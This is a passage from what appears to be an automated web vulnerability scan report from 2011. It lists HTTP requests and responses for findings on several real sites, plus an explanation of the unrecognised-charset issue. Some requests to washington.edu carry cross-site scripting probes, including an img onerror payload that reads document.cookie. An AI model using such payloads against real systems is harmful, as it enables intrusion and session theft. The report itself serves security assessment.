<TITLE>Not Found</TITLE><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you ha
...[SNIP]...

30.154. http://www.vox.com/.shared/css/base.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vox.com
Path:   /.shared/css/base.css

Request

GET /.shared/css/base.css HTTP/1.1
Host: www.vox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Perlbal
Keep-Alive: timeout=30, max=100
Content-Length: 39
Date: Tue, 25 Jan 2011 04:39:49 GMT
X-Varnish: 2314529917
Age: 0
Via: 1.1 varnish
Connection: close

<h1>404 - Not Found</h1>
File not found

30.155. http://www.washington.edu/alpine/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpine/

Request

GET /alpine/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:11:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
Last-Modified: Wed, 02 Jun 2010 21:14:58 GMT
ETag: "508e38-14de-4881295089880"
Accept-Ranges: bytes
Content-Length: 5342
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!--chtml set main title="Alpine Messaging System"-->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Alpine Messaging
...[SNIP]...

30.156. http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a

Request

GET /alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a HTTP/1.1
Host: www.washington.edu
Proxy-Connection: keep-alive
Referer: http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:57:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1721

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83))&gt;e6e3afeb687/a</b> w
...[SNIP]...

30.157. http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a

Request

GET /alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a HTTP/1.1
Host: www.washington.edu
Proxy-Connection: keep-alive
Referer: http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:56:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1623

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie)&gt;e6e3afeb687/a</b> was not found o
...[SNIP]...

30.158. http://www.washington.edu/alpinef972a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Request

GET /alpinef972a<img HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1028
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img</b> was not found or is no longer on this server.
<p>Please check the URL
...[SNIP]...

30.159. http://www.washington.edu/alpinef972a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1175
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83</b> was not found or is
...[SNIP]...

30.160. http://www.washington.edu/alpinef972ae6e3afeb687/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1225
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83))&gt;e6e3afeb687/</b> wa
...[SNIP]...

30.161. http://www.washington.edu/alpinef972a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1136
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie</b> was not found or is no longer on
...[SNIP]...

30.162. http://www.washington.edu/alpinef972ae6e3afeb687/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1183
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie)&gt;e6e3afeb687/</b> was not found or
...[SNIP]...

30.163. http://www.washington.edu/pine/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /pine/

Request

GET /pine/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:11:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
Last-Modified: Tue, 22 Jun 2010 11:34:33 GMT
ETag: "7274aa-1b4f-4899cce20c440"
Accept-Ranges: bytes
Content-Length: 6991
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta name="description" content="The Pine Information Center at the University of Washin
...[SNIP]...

30.164. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Mon, 24 Jan 2011 15:15:24 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

30.165. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Mon, 24 Jan 2011 15:15:24 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

30.166. http://xads.zedo.com/ads3/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads3/a

Request

GET /ads3/a HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:14 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
Set-Cookie: ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 266
Connection: close
Content-Type: text/html

<HTML><HEAD></HEAD><BODY><a href='http://c1.zedo.com/ads3/c?a=0;x=0;g=172,0;c=0,0;i=19;n=0;w=47;m=82;s=0;z=42306355;k=http://www.zedo.com'TARGET='_blank'><img src='http://c1.zedo.com/OzoDB/0/0/0/blank
...[SNIP]...

31. HTML uses unrecognised charset
There are 13 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


31.1. http://home.big.jp/flets/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://home.big.jp
Path:   /flets/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
  • Shift_JIS
  • x-sjis

Request

GET /flets/ HTTP/1.1
Host: home.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:22 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html; charset=Shift_JIS
Content-Length: 20938

<HTML>
<HEAD>
<Title>.t...b.cADSL....B.t...b.c../.l.N.X.g/.v...~.A...... | Amusement BiG-NET http://home.big.jp/flets/</Title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=x-sjis">
<Meta Name="keywords" Content=".t...b.cADSL....B.t...b.c../.l.N.X.g/.v...~.A...... 1GB.....^...T.[.o.[.E.v...o.C._.[ Amusement BiG-NET">
...[SNIP]...

31.2. http://joomlaportal.ru/content/view/2239/70/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://joomlaportal.ru
Path:   /content/view/2239/70/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:
  • windows-1251

Request

GET /content/view/2239/70/ HTTP/1.1
Host: joomlaportal.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 24 Jan 2011 22:41:10 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.2.10
ETag: 62229839aa89cfd54c936ea9dd5cac22
Set-Cookie: 5fc991999f8b2e5e5bb2e3566d439f1f=be443c241334634b0c6c368448814be8; expires=Tue, 25-Jan-2011 10:41:10 GMT; path=/
Last-Modified: Tue, 11 Jan 2011 11:16:11 GMT
Content-Length: 20791

<?xml version="1.0" encoding="windows-1251"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...
<link rel="shortcut icon" href="http://joomlaportal.ru/images/favicon.ico" />
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<meta name="verify-v1" content="AtfLp8fuuecMKJ50uavgDkeVe4+oXk06Yctg39nNGzM=" />
...[SNIP]...

31.3. http://sorgalla.com/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://sorgalla.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
  • "UTF-8"
  • UTF-8

Request

GET / HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:33 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 39294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="PHP, Zend Framework, Datenbanken und was sonst noch so anf..llt." />
...[SNIP]...

31.4. http://sorgalla.com/jcarousel/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://sorgalla.com
Path:   /jcarousel/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:
  • "UTF-8"
  • UTF-8

Request

GET /jcarousel/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:31 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="PHP, Zend Framework, Datenbanken und was sonst noch so anf..llt." />
...[SNIP]...

31.5. http://www.autotrader.com/fyc/index.jsp/x22

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.autotrader.com
Path:   /fyc/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
Set-Cookie: v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>
<meta http-equiv="Content-Type" content="text/html; charset= iso-8859-1" />
<link rel="stylesheet" href="/inc/css/error_pages.css" type="text/css" />
...[SNIP]...

31.6. http://www.autotrader.com/hornav/trader/index.jsp/x22

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:28 GMT
Server: Apache
Set-Cookie: v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1552474122.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>
<meta http-equiv="Content-Type" content="text/html; charset= iso-8859-1" />
<link rel="stylesheet" href="/inc/css/error_pages.css" type="text/css" />
...[SNIP]...

31.7. http://www.autotrader.com/research/certified-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.autotrader.com
Path:   /research/certified-cars/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:25 GMT
Server: Apache
Set-Cookie: v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1787355146.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>
<meta http-equiv="Content-Type" content="text/html; charset= iso-8859-1" />
<link rel="stylesheet" href="/inc/css/error_pages.css" type="text/css" />
...[SNIP]...

31.8. http://www.autotrader.com/research/index.jsp/x22

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.autotrader.com
Path:   /research/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:26 GMT
Server: Apache
Set-Cookie: v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1971904522.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>
<meta http-equiv="Content-Type" content="text/html; charset= iso-8859-1" />
<link rel="stylesheet" href="/inc/css/error_pages.css" type="text/css" />
...[SNIP]...

31.9. http://www.autotrader.com/research/new-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.autotrader.com
Path:   /research/new-cars/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
Set-Cookie: v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=2525552650.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>
<meta http-equiv="Content-Type" content="text/html; charset= iso-8859-1" />
<link rel="stylesheet" href="/inc/css/error_pages.css" type="text/css" />
...[SNIP]...

31.10. http://www.autotrader.com/research/used-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.autotrader.com
Path:   /research/used-cars/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
